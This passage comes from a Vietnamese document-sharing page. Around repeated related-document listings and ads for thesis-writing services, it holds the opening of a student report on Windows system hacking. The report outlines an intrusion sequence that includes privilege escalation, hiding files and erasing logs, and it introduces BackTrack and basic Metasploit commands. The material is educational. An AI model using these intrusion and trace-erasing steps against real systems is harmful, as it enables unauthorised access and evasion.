Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPTMasterCode.vn
Liệt kê các bước để bảo mật cho máy chủ
Định nghĩa bảo mật cho ứng dụng
Giải thích phương thức bảo mật cho dữ liệu bằng cách ngăn chặn thất
thoát dữ liệu (DLP)
Bài 4-Bảo mật máy chủ, ứng dụng, dữ liệu và mạng 3
Giải thích phương thức bảo mật cho dữ liệu bằng cách ngăn chặn thất
thoát dữ liệu (DLP)
Liệt kê các loại thiết bị bảo mật mạng khác nhau và giải thích cách sử
dụng những thiết bị đó
Định nghĩa quá trình chuyển đổi địa chỉ và điều khiển truy cập mạng
Giải thích phương thức tăng cường bảo mật thông qua thiết kế mạng
Biết tạo tài khoản với những quyền khác nhau
Quản lý được tài khoản người dùng
Thiết lập được tường lửa để ngăn chặn những kết nối ngoài ý
muốn
Thiết lập chế độ tự động update của Windows
Biết các chế độ bảo mật của mạng không dây và cấu hình
được trên access point.
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...MasterCode.vn
Mô tả sự khác nhau giữa vi rút và sâu máy tính
Liệt kê các kiểu phần mềm độc hại giấu mình
Nhận dạng các loại phần mềm độc hại nhằm kiếm lợi
Bài 2 - Phần mềm độc hại và các dạng tấn công dùng kỹ nghệ xã hội 3
Nhận dạng các loại phần mềm độc hại nhằm kiếm lợi
Mô tả các kiểu tấn công tâm lý sử dụng kỹ nghệ xã hội
Giải thích các vụ tấn công vật lý sử dụng kỹ nghệ xã
hội
Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...MasterCode.vn
Liệt kê và giải thích các dạng tấn công vào ứng dụng
Liệt kê và giải thích các dạng tấn công vào mạng
Định nghĩa đánh giá khả năng thiệt hại và tầm quan trọng
của nó
Bài 3 - Tấn công vào ứng dụng và mạng, đánh giá các điểm yếu và làm giảm các cuộc tấn
công
3
Định nghĩa đánh giá khả năng thiệt hại và tầm quan trọng
của nó
Phân biệt giữa quét tìm lỗ hổng và kiểm tra sự thâm nhập
Liệt kê các kỹ thuật làm giảm và ngăn chặn các cuộc tấn công
Bài 7: Xác thực và quản lý tài khoản - Giáo trình FPTMasterCode.vn
Mô tả ba kiểu xác thực thông tin
Giải thích những gì mà mô hình đăng nhập đơn nhất có
thể thực hiện
3
Liệt kê các thủ tục quản lý tài khoản để bảo mật mật
khẩu
Định nghĩa các hệ điều hành được tin cậy
MỘT SỐ NGUY CƠ ĐỐI VỚI AN TOÀN, BẢO MẬT THÔNG TIN TRÊN MẠNG CNTT CƠ QUAN ĐẢNG...Vu Hung Nguyen
Hội thảo Hợp tác Phát triển CNTT-TT Việt Nam lần thứ 17 sẽ diễn ra tại khách sạn Xanh thành phố Huế từ ngày 29 đến 31/8/2013. Hội thảo do Bộ Thông tin và Truyền thông, UBND tỉnh Thừa Thiên Huế, Hội Tin học Việt Nam và Hội Tin học thành phố Hồ Chí Minh đồng tổ chức với chủ đề “Xây dựng hạ tầng CNTT-TT đồng bộ từ Trung ương đến địa phương tạo động lực phát triển kinh tế - xã hội”
http://ict2013.thuathienhue.gov.vn/
Nhận viết luận văn đại học, thạc sĩ trọn gói, chất lượng, LH ZALO=>0909232620
Tham khảo dịch vụ, bảng giá tại: https://baocaothuctap.net
Download luận văn đồ án tốt nghiệp ngành công nghệ thông tin với đề tài: Tìm hiểu hệ thống phát hiện cảnh báo nguy cơ tấn công mạng, cho các bạn làm luận văn tham khảo
Bài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPTMasterCode.vn
Định nghĩa điều khiển truy cập và liệt kê bốn mô hình điều
khiển truy cập
Mô tả các phương pháp điều khiển truy cập lô gíc
Bài 6-Kiến thức cơ sở về điều khiển truy cập 3
Giải thích các kiểu điều khiển truy cập vật lý khác nhau
Định nghĩa các dịch vụ xác thực
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPTMasterCode.vn
Mô tả những thách thức của việc bảo mật thông tin
Định nghĩa bảo mật thông tin và giải thích được lý do
khiến bảo mật thông tin trở nên quan trọng
Nhận diện các dạng tấn công phổ biến hiện nay
Liệt kê các bước cơ bản của một cuộc tấn công
Mô tả năm nguyên tắc phòng thủ cơ bản
Hướng dẫn báo cáo thực tập trường học viện tài chínhDương Hà
báo cáo thực tập mẫu, báo cáo thực tập thạc sỹ, báo cáo thực tập thạc sỹ ngành kinh tế, báo cáo thực tập tài chính ngân hàng, báo cáo thực tập kế toán, báo cáo thực tập cao học, báo cáo thực tập thạc sỹ kinh tế, báo cáo thực tập quản trị nhân sự, báo cáo thực tập tốt nghiệp ngành kinh tế, báo cáo thực tập tốt nghiệp ngành kế toán, báo cáo thực tập tốt nghiệp marketing, báo cáo thực tập tốt nghiệp ngành tài chính ngân hàng
báo cáo thực tập mẫu, báo cáo thực tập thạc sỹ, báo cáo thực tập thạc sỹ ngành kinh tế, báo cáo thực tập tài chính ngân hàng, báo cáo thực tập kế toán, báo cáo thực tập cao học, báo cáo thực tập thạc sỹ kinh tế, báo cáo thực tập quản trị nhân sự, báo cáo thực tập tốt nghiệp ngành kinh tế, báo cáo thực tập tốt nghiệp ngành kế toán, báo cáo thực tập tốt nghiệp marketing, báo cáo thực tập tốt nghiệp ngành tài chính ngân hàng
báo cáo thực tập mẫu, báo cáo thực tập thạc sỹ, báo cáo thực tập thạc sỹ ngành kinh tế, báo cáo thực tập tài chính ngân hàng, báo cáo thực tập kế toán, báo cáo thực tập cao học, báo cáo thực tập thạc sỹ kinh tế, báo cáo thực tập quản trị nhân sự, báo cáo thực tập tốt nghiệp ngành kinh tế, báo cáo thực tập tốt nghiệp ngành kế toán, báo cáo thực tập tốt nghiệp marketing, báo cáo thực tập tốt nghiệp ngành tài chính ngân hàng
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPTMasterCode.vn
Liệt kê các bước để bảo mật cho máy chủ
Định nghĩa bảo mật cho ứng dụng
Giải thích phương thức bảo mật cho dữ liệu bằng cách ngăn chặn thất
thoát dữ liệu (DLP)
Bài 4-Bảo mật máy chủ, ứng dụng, dữ liệu và mạng 3
Giải thích phương thức bảo mật cho dữ liệu bằng cách ngăn chặn thất
thoát dữ liệu (DLP)
Liệt kê các loại thiết bị bảo mật mạng khác nhau và giải thích cách sử
dụng những thiết bị đó
Định nghĩa quá trình chuyển đổi địa chỉ và điều khiển truy cập mạng
Giải thích phương thức tăng cường bảo mật thông qua thiết kế mạng
Biết tạo tài khoản với những quyền khác nhau
Quản lý được tài khoản người dùng
Thiết lập được tường lửa để ngăn chặn những kết nối ngoài ý
muốn
Thiết lập chế độ tự động update của Windows
Biết các chế độ bảo mật của mạng không dây và cấu hình
được trên access point.
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...MasterCode.vn
Mô tả sự khác nhau giữa vi rút và sâu máy tính
Liệt kê các kiểu phần mềm độc hại giấu mình
Nhận dạng các loại phần mềm độc hại nhằm kiếm lợi
Bài 2 - Phần mềm độc hại và các dạng tấn công dùng kỹ nghệ xã hội 3
Nhận dạng các loại phần mềm độc hại nhằm kiếm lợi
Mô tả các kiểu tấn công tâm lý sử dụng kỹ nghệ xã hội
Giải thích các vụ tấn công vật lý sử dụng kỹ nghệ xã
hội
Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...MasterCode.vn
Liệt kê và giải thích các dạng tấn công vào ứng dụng
Liệt kê và giải thích các dạng tấn công vào mạng
Định nghĩa đánh giá khả năng thiệt hại và tầm quan trọng
của nó
Bài 3 - Tấn công vào ứng dụng và mạng, đánh giá các điểm yếu và làm giảm các cuộc tấn
công
3
Định nghĩa đánh giá khả năng thiệt hại và tầm quan trọng
của nó
Phân biệt giữa quét tìm lỗ hổng và kiểm tra sự thâm nhập
Liệt kê các kỹ thuật làm giảm và ngăn chặn các cuộc tấn công
Bài 7: Xác thực và quản lý tài khoản - Giáo trình FPTMasterCode.vn
Mô tả ba kiểu xác thực thông tin
Giải thích những gì mà mô hình đăng nhập đơn nhất có
thể thực hiện
3
Liệt kê các thủ tục quản lý tài khoản để bảo mật mật
khẩu
Định nghĩa các hệ điều hành được tin cậy
MỘT SỐ NGUY CƠ ĐỐI VỚI AN TOÀN, BẢO MẬT THÔNG TIN TRÊN MẠNG CNTT CƠ QUAN ĐẢNG...Vu Hung Nguyen
Hội thảo Hợp tác Phát triển CNTT-TT Việt Nam lần thứ 17 sẽ diễn ra tại khách sạn Xanh thành phố Huế từ ngày 29 đến 31/8/2013. Hội thảo do Bộ Thông tin và Truyền thông, UBND tỉnh Thừa Thiên Huế, Hội Tin học Việt Nam và Hội Tin học thành phố Hồ Chí Minh đồng tổ chức với chủ đề “Xây dựng hạ tầng CNTT-TT đồng bộ từ Trung ương đến địa phương tạo động lực phát triển kinh tế - xã hội”
http://ict2013.thuathienhue.gov.vn/
Nhận viết luận văn đại học, thạc sĩ trọn gói, chất lượng, LH ZALO=>0909232620
Tham khảo dịch vụ, bảng giá tại: https://baocaothuctap.net
Download luận văn đồ án tốt nghiệp ngành công nghệ thông tin với đề tài: Tìm hiểu hệ thống phát hiện cảnh báo nguy cơ tấn công mạng, cho các bạn làm luận văn tham khảo
Bài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPTMasterCode.vn
Định nghĩa điều khiển truy cập và liệt kê bốn mô hình điều
khiển truy cập
Mô tả các phương pháp điều khiển truy cập lô gíc
Bài 6-Kiến thức cơ sở về điều khiển truy cập 3
Giải thích các kiểu điều khiển truy cập vật lý khác nhau
Định nghĩa các dịch vụ xác thực
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPTMasterCode.vn
Mô tả những thách thức của việc bảo mật thông tin
Định nghĩa bảo mật thông tin và giải thích được lý do
khiến bảo mật thông tin trở nên quan trọng
Nhận diện các dạng tấn công phổ biến hiện nay
Liệt kê các bước cơ bản của một cuộc tấn công
Mô tả năm nguyên tắc phòng thủ cơ bản
Hướng dẫn báo cáo thực tập trường học viện tài chínhDương Hà
báo cáo thực tập mẫu, báo cáo thực tập thạc sỹ, báo cáo thực tập thạc sỹ ngành kinh tế, báo cáo thực tập tài chính ngân hàng, báo cáo thực tập kế toán, báo cáo thực tập cao học, báo cáo thực tập thạc sỹ kinh tế, báo cáo thực tập quản trị nhân sự, báo cáo thực tập tốt nghiệp ngành kinh tế, báo cáo thực tập tốt nghiệp ngành kế toán, báo cáo thực tập tốt nghiệp marketing, báo cáo thực tập tốt nghiệp ngành tài chính ngân hàng
báo cáo thực tập mẫu, báo cáo thực tập thạc sỹ, báo cáo thực tập thạc sỹ ngành kinh tế, báo cáo thực tập tài chính ngân hàng, báo cáo thực tập kế toán, báo cáo thực tập cao học, báo cáo thực tập thạc sỹ kinh tế, báo cáo thực tập quản trị nhân sự, báo cáo thực tập tốt nghiệp ngành kinh tế, báo cáo thực tập tốt nghiệp ngành kế toán, báo cáo thực tập tốt nghiệp marketing, báo cáo thực tập tốt nghiệp ngành tài chính ngân hàng
báo cáo thực tập mẫu, báo cáo thực tập thạc sỹ, báo cáo thực tập thạc sỹ ngành kinh tế, báo cáo thực tập tài chính ngân hàng, báo cáo thực tập kế toán, báo cáo thực tập cao học, báo cáo thực tập thạc sỹ kinh tế, báo cáo thực tập quản trị nhân sự, báo cáo thực tập tốt nghiệp ngành kinh tế, báo cáo thực tập tốt nghiệp ngành kế toán, báo cáo thực tập tốt nghiệp marketing, báo cáo thực tập tốt nghiệp ngành tài chính ngân hàng
Để xem full tài liệu Xin vui long liên hệ page để được hỗ trợ
:
https://www.facebook.com/garmentspace/
https://www.facebook.com/thuvienluanvan01
HOẶC
https://www.facebook.com/thuvienluanvan01
https://www.facebook.com/thuvienluanvan01
tai lieu tong hop, thu vien luan van, luan van tong hop, do an chuyen nganh
LỜI CẢM ƠN
Với lòng biết ơn sâu sắc, Em xin chân thành cảm ơn các Thầy Cô trường Đại Học Đại Nam nói chung, các Thầy Cô khoa Kế toán nói riêng, những người đã tận tụy dạy dỗ truyền đạt cho em những kiến thức vô cùng quý giá, không chỉ về lĩnh vực chuyên môn mà còn là tấm gương về sự tận tụy, nhiệt tình trong công việc trong thời gian qua. Các Thầy Cô đã tạo điệu kiện cho em trang bị những kiến thức làm hành trang vững chắc tự tin bước trên con đường tương lai.
Đặc biệt em xin cảm ơn Cô Trần Thị Lan Phương, người trực tiếp hướng dẫn và chỉ bảo tận tình, bổ sung kiến thức còn hạn chế của em giúp em hoàn thành tốt khoá luận tốt nghiệp.
Em xin gửi lời cảm ơn đến Ban Giám Đốc, các Anh, Chị trong Phòng Kế toán Công ty TNHH Vận Tải & TM Nam Longđã tận tình hướng dẫn, truyền đạt những kinh nghiệm thực tế trong công việc. Cảm ơn các Anh, Chị đã không tiếc thời gian, tạo mọi điều kiện thuận lợi giúp em hoàn thành công việc của mình.
Trong giới hạn thời gian thực hiện khoá luận mà kiến thức thì vô cùng rộng lớn nên bài viết không tránh khỏi những sai sót, em rất mong được sự thông cảm và tận tình góp ý của Quý Thầy cô và Quý Công ty để giúp em ngày một hoàn thiện hơn và vững vàng, tự tin trong công tác chuyên môn sau này.
Em xin chân thành cảm ơn!
Ngày … tháng … năm 2016
Báo cáo thực tập hoàn thiện công tác Kế toán bán hàng và xác định kết quả kin...Lớp kế toán trưởng
Báo cáo thực tập kế toán :hoàn thiện công tác Kế toán bán hàng và xác định kết quả kinh doanh Công Ty Bóng Đèn Điện Quang.
Xem chi tiết: http://lopketoantruong.com/
Báo cáo kế toán bán hàng và xác định kết quả kinh doanhÁc Quỷ Lộng Hành
Nhóm mình nhận làm báo cáo thực tập tốt nghiệp kế toán, tất cả các đề tài. Làm theo đề cương và sửa hoàn thiện theo yêu cầu của giáo viên. Số liệu tính toán chuẩn. Các bạn có nhu cầu vui lòng liên hệ với mình qua số 01642595778. Mình cảm ơn!
Là hình thức kiểm tra hệ thống CNTT của bạn có thể bị tấn công hay không, bằng cách giả lập các vụ tấn công thử nghiệm tạo ra. Có thể hiểu một cách đơn giản Penetration Testing ( Pentest ) chính là đánh giá độ an toàn bằng cách tấn công vào hệ thống . Vulnerability Assessment là quá trình xem xét lại các dịch vụ và hệ thống để tìm ra các vấn đề an ninh tiềm tàng hoặc dò tìm các dấu vết khi hệ thống bị tổn thương. Người thực hiện một thử nghiệm xâm nhập được gọi là kiểm tra xâm nhập hoặc pentester.
Khi thâm nhập thử nghiệm cần phải có sự cho phép của người sở hữu hệ thống. Nếu không, bạn sẽ là hacking hệ thống, và đó là bất hợp pháp. Nói cách khác: Sự khác biệt giữa thử nghiệm thâm nhập và hack là bạn có sự cho phép của chủ sở hữu hệ thống .
Pháp chứng kỹ thuật số cung cấp cho sinh viên với một cách tiếp cận có hệ thống khi tiến hành một điều tra pháp chứng máy tính (cả hai loại điều tra công quyền và điều tra công ty), các yêu cầu của một phòng thí nghiệm pháp chứng máy tính bao gồm cả thiết bị phục hồi dữ liệu, phần cứng và phần mềm cần thiết để xác nhận pháp chứng kỹ thuật số trong phòng thí nghiệm.
Similar to Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý (20)
Để xem full tài liệu Xin vui long liên hệ page để được hỗ trợ
:
https://www.facebook.com/garmentspace/
https://www.facebook.com/thuvienluanvan01
HOẶC
https://www.facebook.com/thuvienluanvan01
https://www.facebook.com/thuvienluanvan01
tai lieu tong hop, thu vien luan van, luan van tong hop, do an chuyen nganh
GIÁO TRÌNH 2-TÀI LIỆU SỬA CHỮA BOARD MONO TỦ LẠNH MÁY GIẶT ĐIỀU HÒA.pdf
https://dienlanhbachkhoa.net.vn
Hotline/Zalo: 0338580000
Địa chỉ: Số 108 Trần Phú, Hà Đông, Hà Nội
CHUYÊN ĐỀ BỒI DƯỠNG HỌC SINH GIỎI KHOA HỌC TỰ NHIÊN 9 CHƯƠNG TRÌNH MỚI - PHẦN...
Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
1. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 1
MỞ ĐẦU
Theo thống kê của công ty Bkav, từ đầu năm 2013 đến nay, tại Việt Nam đã có
2.405 website của các cơ quan, doanh nghiệp bị xâm nhập, trung bình mỗi tháng có
khoảng 300 website bị tấn công. Ông Vũ Ngọc Sơn, Phó chủ tịch phụ trách Nghiên cứu
phát triển củaBkav cho biết, các cơ quan doanh nghiệp bị tấn công gần như là đầy đủ, từ
ít nghiêm trọng đến nghiêm trọng và rất nghiêm trọng (nhằm đánh cắp các tài liệu mật)
và các mã độc này nhắm cả vào Bộ Công An, Bộ Quốc phòng, ngân hàng, các cơ quan
đơn vị nghiên cứu, các doanh nghiệp… Theo nhìn nhận của Bkav, đã có những chiến
dịch tấn công, phát tán mã độc có chủ đích vào Việt Nam. Trong đó, bản thân các vụ tấn
công trên mạng và các vụ xâm nhập hệ thống công nghệ thông tin là nhằm do thám, trục
lợi, phá hoại dữ liệu, ăn cắp tài sản, cạnh tranh không lành mạnh và một số vụ mất an
toàn thông tin số khác đang gia tăng ở mức báo động về số lượng, đa dạng về hình thức,
tinh vi hơn về công nghệ.
Trước tình hình đó, song songviệc ban hành chỉthị897/CT-TTg,Thủ Tướng chỉđạo
các Bộ, ngành, địa phương tăng cường giải pháp đảm bảo an toàn thông tin số. Thủ tướng
Chính phủ cũng đã nêu rõ, trong thời gian qua, tình hình mất an toàn thông tin số ở nước
ta diễn biến phức tạp, xuất hiện nhiều nguy cơ đe dọa nghiêm trọng đến việc ứng dụng
công nghệ thông tin phục vụ phát triển kinh tế - xã hội và đảm bảo quốc phòng, an ninh.
Bài báo cáo này sẽ giới thiệu tổng quát về các phương pháp mà Hacker sử
dụngđểtấncôngxâmnhậpvàkhaithácvàocácphiểnbảnhệđiềuhành Windows, hệ điều hành
phổ biến nhất hiện nay tại Việt Nam, từ đó giúp chúng ta nắm rõ cách thức mà Hacker sử
dụng và đưa ra các giải pháp giúp cho mỗi người dùng được an toàn thông tin, bảo mật
trong thời đại Internet ngày nay.
Hoàng Thanh Quý.
2. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 2
LỜI CẢM ƠN
Để thực hiện và hoàn thànhđề tài này,trước hết tôi xin cảm ơn đến các thầy Võ Đỗ
Thắng, giảng viên hướng dẫn sinh viên thực tập tại Trung tâm đào tạo quản trị mạngvà an
ninh mạngquốc tế ATHENA, đã tận tình chỉ bảo trong thời gian vừa qua.
Tôicũngxin gửi lờicám ơn đếncác anh chị, bạn bè đã truyền đạt kinh nghiệm và tạo
điều kiện cho tôi hoàn thành đề tài này.
Trong quá trình thực hiệnđề tàikhông thểkhông có nhữngsai sót, mong thầycô tại
trung tâm ATHENA và các bạn thẳng thắn góp ý đề tôi rútkinh nghiệm trong các công
trình tìm hiểu, phát triển sau này.
Hoàng Thanh Quý.
3. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 3
PHẦN 1: GIỚI THIỆU
1.1 System Hacking và Tình hình an ninh mạng Việt Nam
System hacking bao gồm những kỹ thuật lấy username, password dựa vào phần
mềm cài trên hệ thống hoặc tính dễ cài đặt và chạy các dịch vụ từ xa của hệ điều hành
Windows. Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông tin, xóa những log
file hệ thống. Một khi đã xâm nhập vào hệ thống, Hacker có thể thực hiện mọi thứ trên
máy tính đó, gây ra những hậu quả vô cùng nghiêm trọng cho các cá nhân, tổ chức.
1.2 Các lỗ hổng thường khai thác trong hệ điều hành Windows
Phần mềm máy tính ngày nay vô cùng phức tạp, bao gồm hàng ngàn dòng mã.
Phần mềm được viết ra bởi con người, nên cũng chẳng có gì lạ khi trong đó có chứa
những lỗi lập trình, được biết đến với tên gọi lỗ hổng. Những lỗ hổng này được Hacker
sử dụng để xâm nhập vào hệ thống, cũng như được tác giả của các đọan mã độc dùng để
khởi động chương trình của họ một cách tự động trên máy tính của bạn.
Hiện nay các lỗ hổng bảo mật được phát hiện càng nhiều trong các hệ điều hành,
các Web Server hay các phần mềm khác, ... Và các hãng sản xuất luôn cập nhật các lỗ
hổng và đưa ra các phiên bản mới sau khi đã vá lại các lỗ hổng của các phiên bản trước.
Do đó, người sử dụng phải luôn cập nhật thông tin và nâng cấp phiên bản cũ mà mình
đang sử dụng nếu không các Hacker sẽ lợi dụng điều này để tấn công vào hệ thống.
Thông thường, các forum của các hãng nổi tiếng luôn cập nhật các lỗ hổng bảo mật và
việc khai thác các lỗ hổng đó như thế nào thì tùy từng người.
Microsoft luôn có những cải tiến an ninh vượt trội qua mỗi phiên bản mới của hệ
điều hành Windows. Tuy nhiên, một sự thật là các mối đe dọa mạng vẫn đang ngày càng
phát triển nhanh hơn so với chu trình cập nhật và đổi mới hệ điều hành của Microsoft.
Tội phạm mạng thường sử dụng các lỗ hổng trong các mã chương trình để truy
cập vào các dữ liệu và tài nguyên trên máy tính bị lỗi bảo mật. Các chương trình độc hại
được thiết kế đặc biệt để khai thác các lỗ hổng này, được gọi là kỹ thuật exploit, đang
ngày càng phổ biến nhanh chóng.
4. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 4
Những sản phẩm của Microsoft thường gặp phải các lỗ hổng bảo mật như HĐH
Windows,InternetExplorer,WindowsServer,MicrosoftExchangevà.NetFramework.
1.3 Quá trình tấn công vào một hệ thống
Trước tiên ta sẽ tìm hiểu tổng quát một quá trình tấn công hệ thống. Mục tiêu phía
trước của chúng ta là một hệ thống máy tính. Các bước để tấn công, đánh sập nó, có thể
được liệt kê như hình vẽ bên cạnh. Nó gồm 6 công đoạn như sau:
Enumerate (liệt kê): Trích ra tất cả những thông tin có thể về user trong hệ thống.
Sử dụng phương pháp thăm dò SNMP để có được những thông tin hữu ích, chính
xác hơn.
Crack: Công đoạn này có lẽ hấp dẫn nhiềuHackernhất. Bước này yêu cầu chúng ta
bẽ khóa mật khẩu đăng nhậpcủauser.Hoặcbằngmộtcáchnàokhác,mụctiêu phải đạt
tới là quyền truy cập vào hệ thống.
5. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 5
Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi giới hạn truy cập từ user binh
thường lên admin hoặc user có quyền cao hơn đủ cho chúng ta tấn công.
Execute (thực thi): Thực thi ứng dụng trên hệ thống máy đích. Chuẩn bị trước
malware, keylogger, rootkit…để chạy nó trên máy tính tấn công.
Hide (ẩn file): Những file thực thi, file soucecode chạy chương trình… Cần phải
được làm ẩn đi, tránh bị mục tiêu phát hiện tiêu diệt.
Tracks (dấu vết): Tất nhiên không phải là để lại dấu vết. Những thông tin có liên
quan đến bạn cần phải bị xóa sạch, không để lại bất cứ thứ gì. Nếu không khả
năng bạn bị phát hiện là kẻ đột nhập là rất cao.
Tóm lại, quá trình tấn công hệ thống (System hacking) là bước tiếp theo sau quá
trình khảo sát, thu thập thông tin của mục tiêu cần tấn công bằng những kỹ thuật như
Footprinting,Socialengineering,Enumeration,GoogleHacking…đãđượcápdụng cho mục
đích truy tìm thông tin.
Khi hệ thống mục tiêu đã được xác định, chúng ta bắt đầu đi vào quá trình tấn
cônghệthốngthậtsự.Taphảitiếnhànhnhữngkỹthuậtkhácnhauđểlàmsaovào được trong hệ
thống đó, thực hiện những việc mà mình mong muốn, như xóa dữ liệu, chạy chương trình
trojan, keylogger…
6. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 6
PHẦN 2: SỬ DỤNG BACKTRACK ĐỂ KHAI THÁC XÂM NHẬP TRONG
MẠNG LAN
2.1 Hệ điều hành Backtrack 5 R3
Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử
nghiệm xâm nhập. Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của Linux
về thâm nhập thử nghiệm IWHAX, WHOPPIX, và Auditor. Trong phiênbảnhiệntại
củanó(5),BacktrackđượcdựatrênphiênbảnphânphốiLinux Ubuntu 11.10.
Công cụ Backtrack đã có lịch sử phát triển khá lâu qua nhiều bản linux khác nhau.
Phiên bản hiện nay sử dụng bản phân phối Slackware linux (Tomas M.(www.slax.org)).
Backtrack liên tục cập nhật các công cụ, drivers,...Hiện tại Backtrack có trên 300 công cụ
phục vụ cho việc nghiên cứu bảo mật. Backtrack là sự kết hợp giữa 2 bộ công cụ kiểm
thử bảo mật rất nổi tiếng là Whax và Auditor.
Backtrack 5 chứa một số công cụ có thể được sử dụng trong quá trình thử nghiệm
thâm nhập của chúng ta. Các công cụ kiểm tra thâm nhập trong Backtrack 5 có thể được
phân loại như sau:
Information gathering: loại này có chứa một số công cụ có thể được sử dụng để có
được thông tin liên quan đến một mục tiêu DNS, định tuyến, địa chỉ e-mail, trang
web, máy chủ mail, và như vậy. Thông tin này được th u thập từ các thông tin có
sẵn trên Internet, mà không cần chạm vào môi trường mục tiêu.
Network mapping: loại này chứa các công cụ có thể được sử dụng để kiểm tra các
host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi mục tiêu, và cũng
làm portscanning.
Vulnerabilityidentification:Trongthểloạinày,chúngtacóthểtìmthấycác công cụ để
quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng chứa các công cụ
để thực hiện và phân tích Server Message Block (SMB) vàSimple Network
Management Protocol (SNMP).
7. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 7
Web application analysis: loại này chứa các công cụ có thể được sử dụng trong
theo dõi, giám sát các ứng dụng web.
Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng tần
số vô tuyến (RFID), chúng ta có thể sử dụng các công cụ trong thể loại này.
Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ
hổng tìm thấy trong các máy tính mục tiêu.
Privilegeescalation:Saukhikhaitháccáclỗhổngvàđượctruycậpvàocác máy tính mục
tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng cao đặc quyền
của chúng ta cho các đặc quyền cao nhất.
Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong việc duy
trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần để có được
nhữngđặc quyềncaonhấttrướckhicácchúngtacóthểcàiđặtcôngcụđểduytrì quyền truy
cập.
Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công cụ
trong thể loại này.
Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ có thể
được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc
các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp trong
thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong trình đơn khởi
động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và các tập tin trao
đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn.
Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ rối
chương trình một hoặc tháo rời một tập tin thực thi.
Chúng ta có thể tải bản Backtrack 5 tại địa chỉ: www.backtracklinux.org/downloads/
8. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 8
2.2 Phần mềm Metasploit
Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về vấn đề lỗ
hổng bảo mật cũng như giúp đỡ về kiểm tra thăm nhập và phát triển hệ thống phát hiện
tấncôngmạng.MetasploitFrameworklàmộtmôitrườngdùngđểkiểmtra,tấn côngvà khai thác
lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng
đốitượngPerl,vớinhữngcomponentsđượcviếtbằngC,assembler,vàPython. Metasploit có
thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. Chúng ta cóthể
download chương trình tại www.metasploit.com.
Metasploit hỗ trợ nhiều giao diện với người dùng:
Consoleinterface:dùnglệnhmsfconsole.Msfconsoleinterfacesửdụngcác dòng lệnh
để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn.
Webinterface:dùngmsfweb,giaotiếpvớingườidùngthôngquagiaodiện Web.
Command line interface: dùng msfcli.
Metasploit Enviroment:
Global Enviroment: Được thực thi thông qua 2 câu lệnh setg và unsetg, những
options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module exploits.
TemporaryEnviroment:Đượcthựcthithôngqua2câulệnhsetvàunset, enviroment này
chỉ được đưa vào module exploit đang load hiện tại, không ảnh hưởng
đếncácmoduleexploitkhácChúngcóthểlưulạienviromentmìnhđãcấu hình thông qua lệnh
save. Môi trường đó sẽ được lưu trong ./msf/config và sẽ được load trở lại khi user
interface được thực hiện.
Sử dụng Metasploit Framework:
a)Chọn module exploit: Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có
hỗ trợ để khai thác
Show exploits: xem các module exploit mà framework có hỗ trợ.
Use exploit_name: chọn module exploit.
9. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 9
Info exploit_name: xem thông tin về module exploit.
Chúng ta nên cập nhật thường xuyên các lỗi dịch vụ cũng như các modul trên
www.metasploit.comhoặcqualệnhmsfupdatehoặc svnupdat/opt/metasploit/msf3/.
b)Cấu hình Module exploit đã chọn:
show options: Xác định những options nào cần cấu hình.
set : cấu hình cho những option của module đó.
